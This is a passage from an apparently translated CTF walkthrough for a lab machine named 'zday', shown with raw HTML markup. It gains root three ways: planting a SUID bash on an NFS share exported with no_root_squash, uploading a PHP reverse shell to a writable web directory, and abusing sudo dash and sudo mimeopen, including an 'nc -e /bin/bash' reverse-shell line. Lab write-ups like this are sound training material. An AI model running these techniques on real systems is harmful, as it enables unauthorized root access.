src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142355714.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250614134424031\" style=\"zoom:33%;\" 
\/><\/div><\/p>\n<p>This one and a bunch of services below it are all run as <code>root<\/code>...<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142355715.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142355715.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250614134652856\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142355716.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142355716.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250614134752220\" style=\"zoom:33%;\" \/><\/div><\/p>\n<h3>Method 1: Overly Permissive NFS Mount<\/h3>\n<p>Looking at the <code>NFS<\/code> entry highlighted above: <a 
href=\"https:\/\/book.hacktricks.wiki\/en\/linux-hardening\/privilege-escalation\/nfs-no_root_squash-misconfiguration-pe.html#squashing-basic-info\">https:\/\/book.hacktricks.wiki\/en\/linux-hardening\/privilege-escalation\/nfs-no_root_squash-misconfiguration-pe.html#squashing-basic-info<\/a><\/p>\n<blockquote>\n<p>NFS will usually (especially in linux) trust the indicated <code>uid<\/code> and <code>gid<\/code> by the client connecting to access the files (if kerberos is not used). However, there are some configurations that can be set in the server to <strong>change this behavior<\/strong>:<\/p>\n<ul>\n<li><strong><code>all_squash<\/code><\/strong>: It squashes all accesses mapping every user and group to <strong><code>nobody<\/code><\/strong> (65534 unsigned \/ -2 signed). Therefore, everyone is <code>nobody<\/code> and no users are used.<\/li>\n<li><strong><code>root_squash<\/code>\/<code>no_all_squash<\/code><\/strong>: This is default on Linux and <strong>only squashes access with uid 0 (root)<\/strong>. Therefore, any <code>UID<\/code> and <code>GID<\/code> are trusted but <code>0<\/code> is squashed to <code>nobody<\/code> (so no root impersonation is possible).<\/li>\n<li><strong><code>no_root_squash<\/code><\/strong>: This configuration if enabled doesn't even squash the root user. 
This means that if you mount a directory with this configuration you can access it as root.<\/li>\n<\/ul>\n<p>In the <strong>\/etc\/exports<\/strong> file, if you find some directory that is configured as <strong>no_root_squash<\/strong>, then you can <strong>access<\/strong> it from <strong>as a client<\/strong> and <strong>write inside<\/strong> that directory <strong>as<\/strong> if you were the local <strong>root<\/strong> of the machine.<\/p>\n<\/blockquote>\n<p>This means programs on the mounted share can run as root...<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Zday]\n\u2514\u2500$ mkdir temp\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Zday]\n\u2514\u2500$ showmount -e $IP \nExport list for 192.168.10.101:\n\/images\/dev *\n\/images     *\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Zday]\n\u2514\u2500$ sudo mount -t nfs $IP:\/images\/dev temp\/\n[sudo] password for kali: \nCreated symlink &#039;\/run\/systemd\/system\/remote-fs.target.wants\/rpc-statd.service&#039; \u2192 &#039;\/usr\/lib\/systemd\/system\/rpc-statd.service&#039;.\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Zday]\n\u2514\u2500$ cd temp\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Zday\/temp]\n\u2514\u2500$ ls -la  \ntotal 12\ndrwxrwxrwx 3 1001 root 4096 Mar 10  2021 .\ndrwxrwxr-x 3 kali kali 4096 Jun 14 02:07 ..\n-rwxrwxrwx 1 1001 root    0 Mar 10  2021 .mntcheck\ndrwxrwxrwx 2 1001 root 4096 Mar 10  2021 postinitscripts\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Zday\/temp]\n\u2514\u2500$ cd postinitscripts\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Zday\/temp\/postinitscripts]\n\u2514\u2500$ ls -la\ntotal 12\ndrwxrwxrwx 2 1001 root 4096 Mar 10  2021 .\ndrwxrwxrwx 3 1001 root 4096 Mar 10  2021 ..\n-rwxrwxrwx 1 1001 root  249 Mar 10  2021 fog.postinit\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Zday\/temp\/postinitscripts]\n\u2514\u2500$ cat fog.postinit                             
              \n#!\/bin\/bash\n## This file serves as a starting point to call your custom pre-imaging\/post init loading scripts.\n## &lt;SCRIPTNAME&gt; should be changed to the script you&#039;re planning to use.\n## Syntax of post init scripts are\n#. ${postinitpath}&lt;SCRIPTNAME&gt;<\/code><\/pre>\n<p>Check the <code>bash<\/code> version on the original machine:<\/p>\n<pre><code class=\"language-bash\">$ bash --version\nGNU bash, version 5.0.3(1)-release (x86_64-pc-linux-gnu)\nCopyright (C) 2019 Free Software Foundation, Inc.\nLicense GPLv3+: GNU GPL version 3 or later &lt;http:\/\/gnu.org\/licenses\/gpl.html&gt;\n\nThis is free software; you are free to change and redistribute it.\nThere is NO WARRANTY, to the extent permitted by law.<\/code><\/pre>\n<p>Download the tarball for that <code>bash<\/code> version and compile it locally: <a href=\"https:\/\/ftp.gnu.org\/gnu\/bash\/\">https:\/\/ftp.gnu.org\/gnu\/bash\/<\/a>. The build threw errors on my side, so I planned to copy the binary from the next target range instead... In the end the problems with this target machine drove me up the wall, so I used the <code>root<\/code> obtained through method two to <code>copy<\/code> the bash from this target machine, and then continued:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Zday]\n\u2514\u2500$ mkdir temp\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Zday]\n\u2514\u2500$ showmount -e $IP\nExport list for 192.168.10.102:\n\/images\/dev *\n\/images     *\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Zday]\n\u2514\u2500$ sudo mount -t nfs $IP:\/images\/dev temp\/\nCreated symlink 
&#039;\/run\/systemd\/system\/remote-fs.target.wants\/rpc-statd.service&#039; \u2192 &#039;\/usr\/lib\/systemd\/system\/rpc-statd.service&#039;.\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Zday]\n\u2514\u2500$ cp bash temp\/    \n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Zday]\n\u2514\u2500$ cd temp      \n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Zday\/temp]\n\u2514\u2500$ ls -la\ntotal 1156\ndrwxrwxrwx 3 1001 root    4096 Jun 14 11:47 .\ndrwxrwxr-x 3 kali kali    4096 Jun 14 11:46 ..\n-rw-rw-r-- 1 kali kali 1168776 Jun 14 11:47 bash\n-rwxrwxrwx 1 1001 root       0 Mar 10  2021 .mntcheck\ndrwxrwxrwx 2 1001 root    4096 Mar 10  2021 postinitscripts\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Zday\/temp]\n\u2514\u2500$ ls -la \/bin\/bash\n-rwxr-xr-x 1 root root 1298416 May 19 14:11 \/bin\/bash\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Zday\/temp]\n\u2514\u2500$ sudo chmod 4755 bash\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Zday\/temp]\n\u2514\u2500$ ls -la bash     \n-rwsr-xr-x 1 kali kali 1168776 Jun 14 11:47 bash\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Zday\/temp]\n\u2514\u2500$ sudo chown root:root bash\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Zday\/temp]\n\u2514\u2500$ ls -la bash\n-rwxr-xr-x 1 root root 1168776 Jun 14 11:47 bash\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Zday\/temp]\n\u2514\u2500$ sudo chmod 4755 bash              \n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Zday\/temp]\n\u2514\u2500$ ls -la bash\n-rwsr-xr-x 1 root root 1168776 Jun 14 11:47 bash<\/code><\/pre>\n<p>Then escalate privileges:<\/p>\n<pre><code class=\"language-bash\">$ ls -la\ntotal 32\ndrwxr-xr-x 5 fogproject fogproject 4096 Jun 14 02:46 .\ndrwxr-xr-x 4 root       root       4096 Mar 10  2021 ..\n-rw-r--r-- 1 fogproject fogproject  220 Apr 18  2019 .bash_logout\n-rw-r--r-- 1 fogproject fogproject 3899 Mar 10  2021 .bashrc\ndrwxr-xr-x 3 fogproject fogproject 4096 Mar 10  2021 .config\ndrwx------ 3 fogproject 
fogproject 4096 Jun 14 01:43 .gnupg\ndrwxr-xr-x 3 fogproject fogproject 4096 Jun 14 02:46 .local\n-rw-r--r-- 1 fogproject fogproject  807 Apr 18  2019 .profile\n$ cd \/\n$ ls -la\ntotal 80\ndrwxr-xr-x  21 root       root  4096 Mar 10  2021 .\ndrwxr-xr-x  21 root       root  4096 Mar 10  2021 ..\nlrwxrwxrwx   1 root       root     7 Mar 10  2021 bin -&gt; usr\/bin\ndrwxr-xr-x   3 root       root  4096 Mar 10  2021 boot\ndrwxr-xr-x  17 root       root  3100 Jun 14 11:34 dev\ndrwxr-xr-x  80 root       root  4096 Jun 14 11:34 etc\ndrwxr-xr-x   4 root       root  4096 Mar 10  2021 home\ndrwxrwxrwx   4 fogproject root  4096 Mar 10  2021 images\nlrwxrwxrwx   1 root       root    31 Mar 10  2021 initrd.img -&gt; boot\/initrd.img-4.19.0-14-amd64\nlrwxrwxrwx   1 root       root    30 Mar 10  2021 initrd.img.old -&gt; boot\/initrd.img-4.19.0-9-amd64\nlrwxrwxrwx   1 root       root     7 Mar 10  2021 lib -&gt; usr\/lib\nlrwxrwxrwx   1 root       root     9 Mar 10  2021 lib32 -&gt; usr\/lib32\nlrwxrwxrwx   1 root       root     9 Mar 10  2021 lib64 -&gt; usr\/lib64\nlrwxrwxrwx   1 root       root    10 Mar 10  2021 libx32 -&gt; usr\/libx32\ndrwx------   2 root       root 16384 Mar 10  2021 lost+found\ndrwxr-xr-x   3 root       root  4096 Mar 10  2021 media\ndrwxr-xr-x   2 root       root  4096 Mar 10  2021 mnt\ndrwxr-xr-x   2 root       root  4096 Mar 10  2021 opt\ndr-xr-xr-x 158 root       root     0 Jun 14 11:34 proc\ndrwx------   4 root       root  4096 Jun 14 03:14 root\ndrwxr-xr-x  23 root       root   700 Jun 14 11:50 run\nlrwxrwxrwx   1 root       root     8 Mar 10  2021 sbin -&gt; usr\/sbin\ndrwxr-xr-x   4 root       root  4096 Mar 10  2021 srv\ndr-xr-xr-x  13 root       root     0 Jun 14 11:34 sys\ndrwxr-xr-x   5 fogproject root  4096 Mar 10  2021 tftpboot\ndrwxr-xr-x   2 root       root  4096 Mar 10  2021 tftpboot.prev\ndrwxrwxrwt   9 root       root  4096 Jun 14 11:42 tmp\ndrwxr-xr-x  13 root       root  4096 Mar 10  2021 usr\ndrwxr-xr-x  12 root       root  4096 Mar 
10  2021 var\nlrwxrwxrwx   1 root       root    28 Mar 10  2021 vmlinuz -&gt; boot\/vmlinuz-4.19.0-14-amd64\nlrwxrwxrwx   1 root       root    27 Mar 10  2021 vmlinuz.old -&gt; boot\/vmlinuz-4.19.0-9-amd64\n$ cd images\/dev\n$ ls -la\ntotal 1156\ndrwxrwxrwx 3 fogproject root    4096 Jun 14 11:47 .\ndrwxrwxrwx 4 fogproject root    4096 Mar 10  2021 ..\n-rwsr-xr-x 1 root       root 1168776 Jun 14 11:47 bash\n-rwxrwxrwx 1 fogproject root       0 Mar 10  2021 .mntcheck\ndrwxrwxrwx 2 fogproject root    4096 Mar 10  2021 postinitscripts\n$ .\/bash -p\nbash-5.0# whoami;id\nroot\nuid=1001(fogproject) gid=1001(fogproject) euid=0(root) groups=1001(fogproject)\nbash-5.0# cd \/root\nbash-5.0# cat root.txt\nihavebeenherealways<\/code><\/pre>\n<p>This gets root just the same!!!!<\/p>\n<h3>Method 2: Switching to www-data privileges<\/h3>\n<pre><code class=\"language-bash\">$ ls -la \/etc\/nginx\/sites-enabled\/*;\nlrwxrwxrwx 1 root root 34 Mar 10  2021 \/etc\/nginx\/sites-enabled\/default -&gt; \/etc\/nginx\/sites-available\/default\n$ cat \/etc\/nginx\/sites-enabled\/default\n##\n# You should look at the following URL&#039;s in order to grasp a solid understanding\n# of Nginx configuration files in order to fully unleash the power of Nginx.\n# https:\/\/www.nginx.com\/resources\/wiki\/start\/\n# https:\/\/www.nginx.com\/resources\/wiki\/start\/topics\/tutorials\/config_pitfalls\/\n# https:\/\/wiki.debian.org\/Nginx\/DirectoryStructure\n#\n# In most cases, administrators will remove this file from sites-enabled\/ and\n# leave it as reference inside of sites-available where it will continue to be\n# updated by the nginx packaging team.\n#\n# This file will automatically load configuration files provided by other\n# applications, such as Drupal or WordPress. 
These applications will be made\n# available underneath a path with that package name, such as \/drupal8.\n#\n# Please see \/usr\/share\/doc\/nginx-doc\/examples\/ for more detailed examples.\n##\n\n# Default server configuration\n#\nserver {\n        listen 80 default_server;\n        listen [::]:80 default_server;\n\n        # SSL configuration\n        #\n        # listen 443 ssl default_server;\n        # listen [::]:443 ssl default_server;\n        #\n        # Note: You should disable gzip for SSL traffic.\n        # See: https:\/\/bugs.debian.org\/773332\n        #\n        # Read up on ssl_ciphers to ensure a secure configuration.\n        # See: https:\/\/bugs.debian.org\/765782\n        #\n        # Self signed certs generated by the ssl-cert package\n        # Don&#039;t use them in a production server!\n        #\n        # include snippets\/snakeoil.conf;\n\n        root \/var\/www\/html;\n\n        # Add index.php to the list if you are using PHP\n        index index.html index.htm index.nginx-debian.html;\n\n        server_name _;\n\n        location \/ {\n                # First attempt to serve request as file, then\n                # as directory, then fall back to displaying a 404.\n                try_files $uri $uri\/ =404;\n        }\n\n        # pass PHP scripts to FastCGI server\n        #\n        #location ~ \\.php$ {\n        #       include snippets\/fastcgi-php.conf;\n        #\n        #       # With php-fpm (or other unix sockets):\n        #       fastcgi_pass unix:\/run\/php\/php7.3-fpm.sock;\n        #       # With php-cgi (or other tcp sockets):\n        #       fastcgi_pass 127.0.0.1:9000;\n        #}\n\n        # deny access to .htaccess files, if Apache&#039;s document root\n        # concurs with nginx&#039;s one\n        #\n        #location ~ \/\\.ht {\n        #       deny all;\n        #}\n}\n\n# Virtual Host configuration for example.com\n#\n# You can move that to a different file under sites-available\/ and symlink 
that\n# to sites-enabled\/ to enable it.\n#\n#server {\n#       listen 80;\n#       listen [::]:80;\n#\n#       server_name example.com;\n#\n#       root \/var\/www\/example.com;\n#       index index.html;\n#\n#       location \/ {\n#               try_files $uri $uri\/ =404;\n#       }\n#}\n$ ls -la \/etc\/nginx\/sites-enabled\/default\nlrwxrwxrwx 1 root root 34 Mar 10  2021 \/etc\/nginx\/sites-enabled\/default -&gt; \/etc\/nginx\/sites-available\/default\n$ ls -la \/etc\/nginx\/sites-available\/default\n-rw-r--r-- 1 root root 2412 Aug 24  2020 \/etc\/nginx\/sites-available\/default<\/code><\/pre>\n<p>Unfortunately, we do not have execute permission....<\/p>\n<pre><code class=\"language-bash\">$ find \/ -type d -writable 2&gt;\/dev\/null          \n\/images\n\/images\/postdownloadscripts\n\/images\/dev\n\/images\/dev\/postinitscripts\n\/run\/user\/1001\n\/run\/user\/1001\/gnupg\n\/run\/user\/1001\/systemd\n\/run\/lock\n\/home\/fogproject\n\/home\/fogproject\/.gnupg\n\/home\/fogproject\/.gnupg\/private-keys-v1.d\n\/home\/fogproject\/.local\n\/home\/fogproject\/.local\/share\n\/home\/fogproject\/.local\/share\/nano\n\/home\/fogproject\/.config\n\/home\/fogproject\/.config\/autostart\n\/tftpboot\n\/tftpboot\/arm64-efi\n\/tftpboot\/i386-efi\n\/tftpboot\/10secdelay\n\/tftpboot\/10secdelay\/arm64-efi\n\/tftpboot\/10secdelay\/i386-efi\n\/tmp\n\/tmp\/.Test-unix\n\/tmp\/.font-unix\n\/tmp\/.X11-unix\n\/tmp\/.XIM-unix\n\/tmp\/.ICE-unix\n\/proc\/32684\/task\/32684\/fd\n\/proc\/32684\/fd\n\/proc\/32684\/map_files\n\/var\/www\/html\/fog\/service\/ipxe\n\/var\/tmp\n\/var\/lib\/php\/sessions\n\/dev\/mqueue\n\/dev\/shm\n\/sys\/fs\/cgroup\/systemd\/user.slice\/user-1001.slice\/user@1001.service\n\/sys\/fs\/cgroup\/systemd\/user.slice\/user-1001.slice\/user@1001.service\/init.scope\n\/sys\/fs\/cgroup\/systemd\/user.slice\/user-1001.slice\/user@1001.service\/gpg-agent.service\n\/sys\/fs\/cgroup\/unified\/user.slice\/user-1001.slice\/user@100
1.service\n\/sys\/fs\/cgroup\/unified\/user.slice\/user-1001.slice\/user@1001.service\/init.scope\n\/sys\/fs\/cgroup\/unified\/user.slice\/user-1001.slice\/user@1001.service\/gpg-agent.service<\/code><\/pre>\n<p>We find one location where we have write permission:<\/p>\n<pre><code class=\"language-bash\">\/var\/www\/html\/fog\/service\/ipxe<\/code><\/pre>\n<p>Try uploading a reverse shell into it!<\/p>\n<pre><code class=\"language-bash\">$ nano revshell.php\n$ head revshell.php\n\n  &lt;?php\n  \/\/ php-reverse-shell - A Reverse Shell implementation in PHP\n  \/\/ Copyright (C) 2007 pentestmonkey@pentestmonkey.net\n\n  set_time_limit (0);\n  $VERSION = &quot;1.0&quot;;\n  $ip = &#039;192.168.10.102&#039;;  \/\/ You have changed this\n  $port = 1234;  \/\/ And this\n  $chunk_size = 1400;<\/code><\/pre>\n<p>Let us see whether it can be triggered; I keep feeling it will not work...<\/p>\n<pre><code class=\"language-bash\">http:\/\/192.168.10.101\/fog\/service\/ipxe\/revshell.php<\/code><\/pre>\n<p>But in fact it does execute.... It is probably down to some FOG configuration...<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142355717.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142355717.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" 
alt=\"image-20250614150659473\" style=\"zoom:33%;\" \/><\/div><\/p>\n<h4>Switching to dash<\/h4>\n<pre><code class=\"language-bash\">(remote) www-data@zday:\/$ cd ~   \n(remote) www-data@zday:\/var\/www$ ls -la\ntotal 12\ndrwxr-xr-x  3 root root 4096 Mar 10  2021 .\ndrwxr-xr-x 12 root root 4096 Mar 10  2021 ..\nlrwxrwxrwx  1 root root   18 Mar 10  2021 fog -&gt; \/var\/www\/html\/fog\/\ndrwxr-xr-x  3 root root 4096 Mar 10  2021 html\n(remote) www-data@zday:\/var\/www$ sudo -l\nMatching Defaults entries for www-data on zday:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser www-data may run the following commands on zday:\n    (estas) NOPASSWD: \/usr\/bin\/dash\n(remote) www-data@zday:\/var\/www$ sudo -u estas \/usr\/bin\/dash<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142355718.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142355718.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250614150903058\" \/><\/div><\/p>\n<p>It was probably handled automatically by <code>pwncat-cs<\/code>...<\/p>\n<pre><code class=\"language-bash\">(remote) estas@zday:\/var\/www$ cd ~\n(remote) estas@zday:\/home\/estas$ ls -la\ntotal 36\ndrwxr-xr-x 3 estas estas 4096 Mar 10  2021 .\ndrwxr-xr-x 4 root  root  4096 Mar 10  2021 ..\n-rw------- 1 estas estas  100 Mar 10  2021 .Xauthority\n-rw-r--r-- 1 estas estas  220 
Mar 10  2021 .bash_logout\n-rw-r--r-- 1 estas estas 3526 Mar 10  2021 .bashrc\ndrwxr-xr-x 3 estas estas 4096 Mar 10  2021 .local\n-rw-r--r-- 1 estas estas  807 Mar 10  2021 .profile\n-rwx--x--x 1 estas estas 1920 Mar 10  2021 flag.sh\n-rw------- 1 estas estas   15 Mar 10  2021 user.txt\n(remote) estas@zday:\/home\/estas$ .\/flag.sh\n\\033[0;35m\n                                   .     **                                     \n                                *           *.                                  \n                                              ,*                                \n                                                 *,                             \n                         ,                         ,*                           \n                      .,                              *,                        \n                    \/                                    *                      \n                 ,*                                        *,                   \n               \/.                                            .*.                \n             *                                                  **              \n             ,*                                               ,*                \n                **                                          *.                  \n                   **                                    **.                    \n                     ,*                                **                       \n                        *,                          ,*                          \n                           *                      **                            \n                             *,                .*                               \n                                *.           
**                                 \n                                  **      ,*,                                   \n                                     ** *,     \\033[0m\n-------------------------\n\\nPWNED HOST: zday\n\\nPWNED DATE: Sat Jun 14 03:09:38 EDT 2025\n\\nWHOAMI: uid=1000(estas) gid=1000(estas) groups=1000(estas),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)\n\\nFLAG: whereihavebeen\n\\n------------------------\n(remote) estas@zday:\/home\/estas$ cat user.txt\nwhereihavebeen\n(remote) estas@zday:\/home\/estas$ sudo -l\nMatching Defaults entries for estas on zday:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser estas may run the following commands on zday:\n    (ALL : ALL) NOPASSWD: \/usr\/bin\/mimeopen\n(remote) estas@zday:\/home\/estas$ sudo \/usr\/bin\/mimeopen --help\nUsage:\n    mimeopen [options] [-] files\n\nOptions:\n    -a, --ask\n        Do not execute the default application but ask which application to\n        run. This does not change the default application.\n\n    -d, --ask-default\n        Let the user choose a new default program for given files.\n\n    -n, --no-ask\n        Don&#039;t ask the user which program to use. Choose the default program\n        or the first program known to handle the file mimetype. This does\n        not set the default application.\n\n    -M, --magic-only\n        Do not check for extensions, globs or inode type, only look at the\n        content of the file. This is particularly useful if for some reason\n        you don&#039;t trust the name or the extension a file has.\n\n    --database=mimedir:mimedir:...\n        Force the program to look in these directories for the shared\n        mime-info database. 
The directories specified by the basedir\n        specification are ignored.\n\n    -D, --debug\n        Print debug information about how the mimetype was determined.\n\n    -h, --help\n    -u, --usage\n        Print a help message and exits.\n\n    -v, --version\n        Print the version of the program and exit.<\/code><\/pre>\n<h4>Command execution via mimeopen<\/h4>\n<p>What is this.... Let me try it out:<\/p>\n<pre><code class=\"language-bash\">(remote) estas@zday:\/home\/estas$ sudo \/usr\/bin\/mimeopen user.txt\nPlease choose a default application for files of type text\/plain\n\n        1) Vim  (vim)\n        2) Other...\n\nuse application #1\nOpening &quot;user.txt&quot; with Vim  (text\/plain)\nCan&#039;t exec &quot;xterm&quot;: No such file or directory at \/usr\/share\/perl5\/File\/DesktopEntry.pm line 247, &lt;STDIN&gt; line 1.\n\n(remote) estas@zday:\/home\/estas$ sudo \/usr\/bin\/mimeopen flag.sh \nPlease choose a default application for files of type application\/x-shellscript\n\n        1) Vim  (vim)\n        2) Other...\n\nuse application #2\nuse command: whoami\nOpening &quot;flag.sh&quot; with whoami  (application\/x-shellscript)\nwhoami: extra operand &#039;flag.sh&#039;\nTry &#039;whoami --help&#039; for more information.<\/code><\/pre>\n<p>This suggests the two may be related: the command entered afterwards seems to be used to read and execute the file given before it? I tried to use this to run a command, and kept trying until it finally clicked:<\/p>\n<pre><code class=\"language-bash\">(remote) estas@zday:\/tmp$ echo &#039;nc -e \/bin\/bash 192.168.10.102 2345&#039; &gt; temp\n(remote) estas@zday:\/tmp$ chmod +x temp\n(remote) estas@zday:\/tmp$ sudo \/usr\/bin\/mimeopen -d temp\nPlease choose a default application for files of type application\/x-shellscript\n\n      
  1) chmod  (chmod-usercreated-1)\n        2) Vim  (vim)\n        3) su  (su-usercreated-1)\n        4) Other...\n\nuse application #4\nuse command: bash\nOpening &quot;temp&quot; with bash  (application\/x-shellscript)\nstty: &#039;standard input&#039;: Inappropriate ioctl for device\n<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142355719.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142355719.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250614153613690\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>Got a root shell!!!!!<\/p>\n<pre><code class=\"language-bash\">(remote) root@zday:\/tmp# cd ~\n(remote) root@zday:\/root# ls -la\ntotal 36\ndrwx------  4 root root 4096 Jun 14 03:14 .\ndrwxr-xr-x 21 root root 4096 Mar 10  2021 ..\n-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc\ndrwxr-xr-x  2 root root 4096 Jun 14 03:14 .config\ndrwxr-xr-x  3 root root 4096 Mar 10  2021 .local\n-rw-r--r--  1 root root  148 Aug 17  2015 .profile\n-rw-r--r--  1 root root  209 Mar 10  2021 .wget-hsts\n-rwx--x--x  1 root root 1920 Mar 10  2021 flag.sh\n-rw-------  1 root root   20 Mar 10  2021 root.txt\n(remote) root@zday:\/root# .\/flag.sh\n\\033[0;35m\n                                   .     **                                     \n                                *           *.                                  
